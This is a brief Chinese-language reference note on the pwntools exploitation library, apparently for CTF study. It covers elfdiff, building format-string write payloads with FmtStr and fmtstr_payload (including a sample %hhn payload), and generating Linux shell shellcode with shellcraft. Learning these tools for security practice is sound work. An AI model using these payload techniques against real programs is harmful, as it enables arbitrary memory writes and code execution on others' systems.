# pwntools 相關文件 : http://brieflyx.me/2015/python-module/pwntools-intro/ [pdf document](https://media.readthedocs.org/pdf/pwntools/stable/pwntools.pdf) ## elfdiff `elfdiff A B` 用法跟 vimdiff 一樣就是給兩個檔案 ## Format String ## FmtStr ```python # Function called in order to send a payload def send_payload(payload): log.info("payload = %s" % repr(payload)) p.sendline(payload) return p.recv() # Create a FmtStr object and give to him the function format_string = FmtStr(execute_fmt=send_payload) format_string.write(0x0, 0x1337babe) # write 0x1337babe at 0x0 format_string.write(0x1337babe, 0x0) # write 0x0 at 0x1337babe format_string.execute_writes() ``` execute_writes 就是產生 payload 丟到你給他的 execute_fmt 執行 ### fmtstr_payload ```python >> fmtstr_payload(6, {0x08048000:0x10203040}) ''' \x00\x80\x04\x08 \x01\x80\x04\x08 \x02\x80\x04\x08 \x03\x80\x04\x08 %48c%6$hhn %240c%7$hhn %240c%8$hhn %240c%9$hhn ''' ``` `fmtstr_payload(offset, writes, numbwritten=0, write_size='byte')` numbwritten 是已經 printf 過的字 write_size 要一次 write 多少 (byte: hhn, short: hn, int: n) ## shellcraft ``` shellcraft.i386.linux.sh() ```